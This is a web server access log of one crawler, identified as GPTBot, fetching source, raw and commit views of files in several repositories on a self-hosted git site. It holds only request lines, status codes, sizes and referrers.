"/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 9888] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:16:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 49736] [Gzip 27.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:16:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:16:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:16:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 10992] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:16:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpython3.12" [Client 74.7.227.38] [Length 23625] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:16:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpip3.12" [Client 74.7.227.38] [Length 24112] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:16:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" +[17/Feb/2026:16:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11272] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11317] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11319] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:16:05:17 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 10987] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12196] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:05:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PythonTest/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:16:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PythonTest/README.md" +[17/Feb/2026:16:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/.gitignore?display=source" [Client 74.7.227.38] [Length 12239] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/.gitignore" +[17/Feb/2026:16:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" +[17/Feb/2026:16:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12347] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11259] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 21546] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" +[17/Feb/2026:16:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" +[17/Feb/2026:16:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 26338] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" +[17/Feb/2026:16:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11058] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr 